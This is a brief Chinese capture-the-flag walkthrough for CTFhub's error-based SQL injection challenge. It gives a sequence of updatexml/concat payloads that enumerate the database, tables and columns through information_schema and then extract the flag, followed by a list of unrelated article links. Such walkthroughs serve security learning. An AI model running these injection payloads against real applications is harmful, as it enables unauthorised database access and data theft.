CTFhub-sqli注入-报错注入

用到的函数

updatexml(1, ,1)

concat(0x7e, ,0x7e)

group_concat(目标值)

right(,32)

1

1'

1 union select updatexml(1,concat(0x7e,database(),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='sqli'),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag),0x7e),1)

1 union select updatexml(1,**concat(0x7e,right((select(group_concat(flag))from sqli.flag),32),0x7e),**1)

相关推荐
喵叔哟1 分钟前
9.数据库集成
数据库
范纹杉想快点毕业8 分钟前
FPGA实现同步RS422转UART方案
数据库·单片机·嵌入式硬件·fpga开发·架构
醉舞经阁半卷书18 分钟前
深入了解ETCD
数据库·etcd
熊文豪11 分钟前
金仓数据库PL/SQL兼容性深度评测:为什么说它最接近Oracle?
数据库·pl/sql·金仓数据库·kes
廋到被风吹走14 分钟前
【数据库】【MySQL】高可用与扩展方案深度解析
android·数据库·mysql
深蓝电商API15 分钟前
爬虫全链路加密传输:HTTPS + 数据AES加密实战
数据库·爬虫·https
春蕾夏荷_72829772521 分钟前
c++ 将xml数据写入sqlite数据库
xml·数据库
廋到被风吹走8 小时前
【数据库】【MySQL】InnoDB外键解析:约束机制、性能影响与最佳实践
android·数据库·mysql
掘根9 小时前
【消息队列】交换机数据管理实现
网络·数据库
Logic1019 小时前
《Mysql数据库应用》 第2版 郭文明 实验6 数据库系统维护核心操作与思路解析
数据库·sql·mysql·学习笔记·计算机网络技术·形考作业·国家开放大学